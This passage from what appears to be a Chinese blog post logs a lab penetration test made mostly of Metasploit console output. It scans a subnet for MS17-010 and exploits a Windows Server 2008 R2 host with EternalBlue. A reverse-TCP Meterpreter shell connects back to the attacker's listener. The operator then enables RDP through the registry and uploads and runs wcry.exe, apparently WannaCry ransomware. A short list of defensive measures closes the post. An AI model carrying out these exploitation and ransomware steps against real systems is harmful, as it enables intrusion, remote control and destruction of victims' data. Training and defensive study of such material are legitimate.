[-] 192.168.50.232:445    - Rex::HostUnreachable: The host (192.168.50.232:445) was unreachable.
[-] 192.168.50.235:445    - Rex::HostUnreachable: The host (192.168.50.235:445) was unreachable.
[-] 192.168.50.236:445    - Rex::HostUnreachable: The host (192.168.50.236:445) was unreachable.
[-] 192.168.50.233:445    - Rex::HostUnreachable: The host (192.168.50.233:445) was unreachable.
[-] 192.168.50.255:445    - Rex::HostUnreachable: The host (192.168.50.255:445) was unreachable.
[+] 192.168.50.252:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
[-] 192.168.50.238:445    - Rex::HostUnreachable: The host (192.168.50.238:445) was unreachable.
[-] 192.168.50.240:445    - Rex::HostUnreachable: The host (192.168.50.240:445) was unreachable.
[-] 192.168.50.237:445    - Rex::HostUnreachable: The host (192.168.50.237:445) was unreachable.
[-] 192.168.50.239:445    - Rex::HostUnreachable: The host (192.168.50.239:445) was unreachable.
[-] 192.168.50.241:445    - Rex::HostUnreachable: The host (192.168.50.241:445) was unreachable.
[-] 192.168.50.242:445    - Rex::HostUnreachable: The host (192.168.50.242:445) was unreachable.
[-] 192.168.50.243:445    - Rex::HostUnreachable: The host (192.168.50.243:445) was unreachable.
[-] 192.168.50.245:445    - Rex::HostUnreachable: The host (192.168.50.245:445) was unreachable.
[-] 192.168.50.247:445    - Rex::HostUnreachable: The host (192.168.50.247:445) was unreachable.
[-] 192.168.50.249:445    - Rex::HostUnreachable: The host (192.168.50.249:445) was unreachable.
[-] 192.168.50.246:445    - Rex::HostUnreachable: The host (192.168.50.246:445) was unreachable.
[-] 192.168.50.250:445    - Rex::HostUnreachable: The host (192.168.50.250:445) was unreachable.
[-] 192.168.50.248:445    - Rex::HostUnreachable: The host (192.168.50.248:445) was unreachable.
[-] 192.168.50.244:445    - Rex::HostUnreachable: The host (192.168.50.244:445) was unreachable.
[-] 192.168.50.251:445    - Rex::HostUnreachable: The host (192.168.50.251:445) was unreachable.
[-] 192.168.50.254:445    - Rex::HostUnreachable: The host (192.168.50.254:445) was unreachable.
[-] 192.168.50.253:445    - Rex::HostUnreachable: The host (192.168.50.253:445) was unreachable.
[*] 192.168.50.0/24:445   - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads

Compatible Payloads
===================

   #   Name                                                Disclosure Date  Rank    Check  Description
   -   ----                                                ---------------  ----    -----  -----------
   0   payload/generic/custom                                               normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                       normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                                    normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/windows/x64/exec                                             normal  No     Windows x64 Execute Command
   4   payload/windows/x64/loadlibrary                                      normal  No     Windows x64 LoadLibrary Path
   5   payload/windows/x64/messagebox                                       normal  No     Windows MessageBox x64
   6   payload/windows/x64/meterpreter/bind_ipv6_tcp                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   7   payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
   8   payload/windows/x64/meterpreter/bind_named_pipe                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
   9   payload/windows/x64/meterpreter/bind_tcp                             normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
   10  payload/windows/x64/meterpreter/bind_tcp_rc4                         normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   11  payload/windows/x64/meterpreter/bind_tcp_uuid                        normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
   12  payload/windows/x64/meterpreter/reverse_http                         normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   13  payload/windows/x64/meterpreter/reverse_https                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   14  payload/windows/x64/meterpreter/reverse_named_pipe                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
   15  payload/windows/x64/meterpreter/reverse_tcp                          normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
   16  payload/windows/x64/meterpreter/reverse_tcp_rc4                      normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   17  payload/windows/x64/meterpreter/reverse_tcp_uuid                     normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
   18  payload/windows/x64/meterpreter/reverse_winhttp                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
   19  payload/windows/x64/meterpreter/reverse_winhttps                     normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
   20  payload/windows/x64/peinject/bind_ipv6_tcp                           normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
   21  payload/windows/x64/peinject/bind_ipv6_tcp_uuid                      normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
   22  payload/windows/x64/peinject/bind_named_pipe                         normal  No     Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
   23  payload/windows/x64/peinject/bind_tcp                                normal  No     Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
   24  payload/windows/x64/peinject/bind_tcp_rc4                            normal  No     Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   25  payload/windows/x64/peinject/bind_tcp_uuid                           normal  No     Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
   26  payload/windows/x64/peinject/reverse_named_pipe                      normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
   27  payload/windows/x64/peinject/reverse_tcp                             normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
   28  payload/windows/x64/peinject/reverse_tcp_rc4                         normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   29  payload/windows/x64/peinject/reverse_tcp_uuid                        normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
   30  payload/windows/x64/pingback_reverse_tcp                             normal  No     Windows x64 Pingback, Reverse TCP Inline
   31  payload/windows/x64/powershell_bind_tcp                              normal  No     Windows Interactive Powershell Session, Bind TCP
   32  payload/windows/x64/powershell_reverse_tcp                           normal  No     Windows Interactive Powershell Session, Reverse TCP
   33  payload/windows/x64/shell/bind_ipv6_tcp                              normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
   34  payload/windows/x64/shell/bind_ipv6_tcp_uuid                         normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
   35  payload/windows/x64/shell/bind_named_pipe                            normal  No     Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
   36  payload/windows/x64/shell/bind_tcp                                   normal  No     Windows x64 Command Shell, Windows x64 Bind TCP Stager
   37  payload/windows/x64/shell/bind_tcp_rc4                               normal  No     Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   38  payload/windows/x64/shell/bind_tcp_uuid                              normal  No     Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
   39  payload/windows/x64/shell/reverse_tcp                                normal  No     Windows x64 Command Shell, Windows x64 Reverse TCP Stager
   40  payload/windows/x64/shell/reverse_tcp_rc4                            normal  No     Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   41  payload/windows/x64/shell/reverse_tcp_uuid                           normal  No     Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
   42  payload/windows/x64/shell_bind_tcp                                   normal  No     Windows x64 Command Shell, Bind TCP Inline
   43  payload/windows/x64/shell_reverse_tcp                                normal  No     Windows x64 Command Shell, Reverse TCP Inline
   44  payload/windows/x64/vncinject/bind_ipv6_tcp                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
   45  payload/windows/x64/vncinject/bind_ipv6_tcp_uuid                     normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
   46  payload/windows/x64/vncinject/bind_named_pipe                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
   47  payload/windows/x64/vncinject/bind_tcp                               normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
   48  payload/windows/x64/vncinject/bind_tcp_rc4                           normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   49  payload/windows/x64/vncinject/bind_tcp_uuid                          normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
   50  payload/windows/x64/vncinject/reverse_http                           normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   51  payload/windows/x64/vncinject/reverse_https                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   52  payload/windows/x64/vncinject/reverse_tcp                            normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
   53  payload/windows/x64/vncinject/reverse_tcp_rc4                        normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   54  payload/windows/x64/vncinject/reverse_tcp_uuid                       normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
   55  payload/windows/x64/vncinject/reverse_winhttp                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
   56  payload/windows/x64/vncinject/reverse_winhttps                       normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload payload/windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.50.252
rhost => 192.168.50.252
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.50.153
lhost => 192.168.50.153
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.50.153:4444
[*] 192.168.50.252:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.50.252:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.50.252:445    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.50.252:445 - The target is vulnerable.
[*] 192.168.50.252:445 - Connecting to target for exploitation.
[+] 192.168.50.252:445 - Connection established for exploitation.
[+] 192.168.50.252:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.50.252:445 - CORE raw buffer dump (53 bytes)
[*] 192.168.50.252:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.50.252:445 - 0x00000010  30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65  008 R2 Datacente
[*] 192.168.50.252:445 - 0x00000020  72 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  r 7601 Service P
[*] 192.168.50.252:445 - 0x00000030  61 63 6b 20 31                                   ack 1
[+] 192.168.50.252:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.50.252:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.50.252:445 - Sending all but last fragment of exploit packet
[*] 192.168.50.252:445 - Starting non-paged pool grooming
[+] 192.168.50.252:445 - Sending SMBv2 buffers
[+] 192.168.50.252:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.50.252:445 - Sending final SMBv2 buffers.
[*] 192.168.50.252:445 - Sending last fragment of exploit packet!
[*] 192.168.50.252:445 - Receiving response from exploit packet
[+] 192.168.50.252:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.50.252:445 - Sending egg to corrupted connection.
[*] 192.168.50.252:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.50.252
[*] Meterpreter session 1 opened (192.168.50.153:4444 -> 192.168.50.252:49159) at 2023-09-26 16:54:26 +0800
[+] 192.168.50.252:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.50.252:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.50.252:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > sysinfo
Computer        : WIN-H42D9A3N5M3
OS              : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:92:c2:44
MTU          : 1500
IPv4 Address : 192.168.50.252
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::742a:8f0e:f788:d1a5
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:32fc
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

meterpreter > shell
Process 1288 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>net user
net user

\\ ���û��ʻ�

-------------------------------------------------------------------------------
Administrator            EricWee                  Guest
�����������ϣ�������һ��������������


C:\Windows\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
�����ɹ����ɡ�

C:\Windows\system32>exit
exit
meterpreter > backgroud
[-] Unknown command: backgroud
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > upload /home/kali/Downloads/wcry.ext C:\\
[-] Error running command upload: Errno::ENOENT No such file or directory @ rb_file_s_stat - /home/kali/Downloads/wcry.ext
meterpreter > upload /home/kali/Downloads/wcry.exe C:\\
[*] uploading  : /home/kali/Downloads/wcry.exe -> C:\
[*] uploaded   : /home/kali/Downloads/wcry.exe -> C:\\wcry.exe
meterpreter > execute -f c:\\wcry.exe

从Linux远程登录windows系统

rdesktop 192.168.50.252

防御技术
- 探测和扫描防护 - 使用防火墙来判断访问行为是否是扫描，如果判断是，则拒绝所有访问
- 暴力破解防护
  - 设置账户登录失败的锁定策略
  - 增加图形验证码
  - 增强密码强度，定期更改密码
  - 使用双因素认证
- 危险服务的防护
  - 在无绝对必要的情况下，尽量关闭风险服务
  - RDP - 使用ACL只允许网管机登陆
  - Telnet - 建议使用SSH来代替
  - SSH - 使用密码+公钥文件的方式来验证登录 - 可以使用SecureCRT生成公钥文件
  - SMB - 关闭默认隐藏共享，重启后服务器自动共享
```
net share

net share C$ del

net share admin$ del

上面的脚本创建sharedel.bat, 在本地组策略编辑器中（gpedit.msc)，用户开机后自动执行这个脚本。
```

posted @ 2023-09-26 17:47 晨风_Eric 阅读(104) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

一蓑烟雨

该面对的绝不逃避，该执著的永不怨悔，该舍弃的不再留念，该珍惜的好好把握。

情报搜集技术

情报搜集技术

公告